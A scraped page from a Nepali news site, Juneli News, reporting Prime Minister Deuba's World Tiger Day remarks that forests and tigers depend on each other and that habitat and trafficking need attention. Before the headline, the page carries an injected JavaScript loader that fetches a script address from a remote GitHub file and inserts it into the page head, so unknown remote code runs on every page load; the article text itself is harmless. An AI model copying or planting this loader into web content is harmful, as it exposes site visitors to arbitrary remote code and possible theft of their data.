;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ‘जंगल र बाघ एक अर्काको लागि आवश्यक कुरा हुन्’ -प्रधानमन्त्री देउवा – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ‘जंगल र बाघ एक अर्काको लागि आवश्यक कुरा हुन्’ -प्रधानमन्त्री देउवा
Breaking News

‘जंगल र बाघ एक अर्काको लागि आवश्यक कुरा हुन्’ -प्रधानमन्त्री देउवा

जुनेली न्यूज, काठमाण्डौ | बिश्व बाघ दिवसको अवसरमा प्रधानमन्त्री निवास बालुवाटारमा आयोजित कार्यक्रममा प्रधानमन्त्री शेर बहादुर देउवाले वर्तमान अवस्थामा बनजंगलको बिनासको कारण बाघको बासस्थानमा धेरै प्रभाव परेको बताउनु भएको छ |

प्रधानमन्त्री देउवाले  बाघको संरक्षण तथा बास स्थानका लागि जंगल आवश्यक रहेकाले जंगल जोगाउनतर्फ सबैले ध्यान दिनुपर्ने बताएका छन् |
बाघको बासस्थान सुरक्षा गर्दै चोरी निकासी रोक्न  आवश्यक रहेको उनले बताए  उनले भने ‘ जंगल र बाघ एक अर्काको लागि आवश्यक कुरा हुन् बाघको बास स्थान सुरक्षित गर्न बिशेष ध्यान दिनुपर्छ |’

फेसबुक प्रतिक्रियाहरु